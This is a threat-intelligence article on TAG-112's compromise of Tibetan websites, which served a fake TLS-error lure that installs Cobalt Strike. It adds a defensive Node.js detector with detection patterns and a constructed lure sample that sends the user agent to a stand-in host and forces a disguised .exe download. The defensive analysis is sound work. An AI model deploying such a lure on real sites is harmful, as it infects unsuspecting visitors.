A suspected Chinese state-sponsored threat group tracked as TAG-112 has compromised Tibetan media and university websites as part of a new cyber espionage campaign.
According to the researchers who reported the activity, the group used the compromised sites to deliver a Cobalt Strike post-exploitation payload to visitors and harvest information for espionage. The attackers injected malicious JavaScript into the sites that spoofs a TLS certificate error to trick visitors into downloading a malicious program disguised as a security certificate.
Cobalt Strike is a commercial red-team framework whose Beacon implant threat actors frequently repurpose for remote access and post-exploitation; its use here underscores the continued prominence of cyber espionage against Tibetan entities.
TAG-112 is reportedly a sub-group of the Evasive Panda threat group.
The campaign has been attributed to TAG-112, which has been described as a possible sub-group of the cluster known as Evasive Panda. Researchers assess that the two are closely related because of tactical overlaps and a shared history of targeting Tibetan entities.
The attacks succeeded in compromising several Tibetan community websites, namely Tibet Post and Gyudmed Tantric University. Initial assessment of the hacked sites showed that the attackers modified them to prompt visitors to download a malicious application disguised as a “security certificate” that, when executed, loaded a Cobalt Strike payload.
The JavaScript that enabled this was allegedly uploaded to the sites, most likely through a security flaw in their content management system, Joomla. The malicious JavaScript runs on the window.onload event. It first checks the visitor’s operating system and browser type and terminates if the operating system is not Windows, so non-Windows visitors are excluded from the rest of the attack chain.
On a Windows device, the script sends the browser information to a remote server, which returns an HTML template that is a modified copy of that browser’s TLS certificate error page, the page a browser normally shows when there is a problem with a site’s TLS certificate.
Alongside the fake certificate warning, the JavaScript initiates the download of a supposed security certificate for the domain *.dnspod[.]cn. The download is in fact a legitimately signed executable that loads a Cobalt Strike Beacon payload via DLL sideloading. No real browser asks the user to download and run software to resolve a TLS error, so a “certificate error” page that offers a download is itself a strong indicator of a lure.
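The behaviours described above (a window.onload hook, a Windows-only gate on navigator.userAgent, a request to a foreign host whose response replaces the page, and a forced download of a “certificate”) are something a site operator can look for in the scripts served by their own pages. The following Node.js triage script is an added example, not code from the report or from the researchers; it scans script source text for those indicators and returns the hits and a verdict. The two sample scripts, the host names (update.example-cdn.test, www.example-site.test) and the file names in them are constructed for illustration and do not come from the campaign.

```javascript
// Heuristic triage of inline JavaScript for the fake-TLS-error lure pattern.
// Added example: indicator names, thresholds and samples are the author's own.

// Collect every host referenced by an absolute http(s) URL in the script.
function extractHosts(src) {
  const hosts = new Set();
  const re = /https?:\/\/([A-Za-z0-9.-]+)/g;
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Return the indicators found in `src` and a verdict. `siteHost` is the host
// the script was served from; requests to any other host count as foreign.
function scanScript(src, siteHost) {
  const site = siteHost.toLowerCase();
  const hits = [];

  // 1. Code that runs once the page has finished loading.
  if (/window\s*\.\s*onload\s*=|addEventListener\s*\(\s*['"]load['"]/.test(src)) hits.push('load-hook');

  // 2. Inspects the browser/OS string and mentions Windows (the OS gate).
  if (/navigator\s*\.\s*(userAgent|platform|appVersion)/.test(src) && /\bWin(dows|32|64)\b/.test(src)) hits.push('windows-gate');

  // 3. Talks to a host other than the site itself (or a subdomain of it).
  const foreignHosts = extractHosts(src).filter((h) => h !== site && !h.endsWith('.' + site));
  if (foreignHosts.length > 0) hits.push('foreign-host');

  // 4. Fetches remote content and writes it into the document (the swapped-in error page).
  if (/(XMLHttpRequest|fetch\s*\()/.test(src) && /(\.innerHTML\s*=|document\.write\s*\()/.test(src)) hits.push('remote-template');

  // 5. Programmatically triggers a file download.
  if (/\.download\s*=/.test(src) || /\.click\s*\(\s*\)/.test(src)) hits.push('forced-download');

  // 6. Certificate-themed strings and executable references in the same script.
  if (/certificate|\.cer\b|\.crt\b/i.test(src)) hits.push('cert-lure');
  if (/\.exe\b/i.test(src)) hits.push('exe-reference');

  // Verdict: the lure needs the load hook, the OS gate, a foreign host, and
  // either a page swap or a forced download. Analytics snippets usually lack
  // the OS gate and the download.
  const suspicious =
    hits.includes('load-hook') &&
    hits.includes('windows-gate') &&
    hits.includes('foreign-host') &&
    (hits.includes('remote-template') || hits.includes('forced-download'));

  return { hits, foreignHosts, verdict: suspicious ? 'suspicious' : 'benign' };
}

// Constructed sample resembling the described lure (not the real injected script).
const LURE_SAMPLE = `
window.onload = function () {
  var ua = navigator.userAgent;
  if (ua.indexOf("Windows") === -1) { return; }
  var x = new XMLHttpRequest();
  x.open("POST", "https://update.example-cdn.test/t", true);
  x.onload = function () {
    document.documentElement.innerHTML = x.responseText;
    var a = document.createElement("a");
    a.href = "https://update.example-cdn.test/cert-update.exe";
    a.download = "security-certificate.cer";
    a.click();
  };
  x.send(ua);
};`;

// Constructed benign sample: a same-host analytics beacon that also runs on load.
const BENIGN_SAMPLE = `
window.addEventListener("load", function () {
  var img = new Image();
  img.src = "https://www.example-site.test/stats.gif?ua=" + encodeURIComponent(navigator.userAgent);
});`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanScript(LURE_SAMPLE, 'www.example-site.test'), null, 2));
  console.log(JSON.stringify(scanScript(BENIGN_SAMPLE, 'www.example-site.test'), null, 2));
}
```

Run it with `node` and point `scanScript` at the contents of each inline `<script>` block and each first-party script file a page serves. The checks are deliberately coarse: they are a triage filter to surface scripts worth a manual look, not a signature for this specific campaign, and a minified or obfuscated injection will need the same indicators hunted for after deobfuscation.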
Tibetan entities are the primary targets of this campaign and should be alert to it. Operators of community sites should in particular keep their Joomla installations patched, review their pages for injected scripts, and treat any browser “certificate error” that offers a file download as a lure rather than a genuine warning.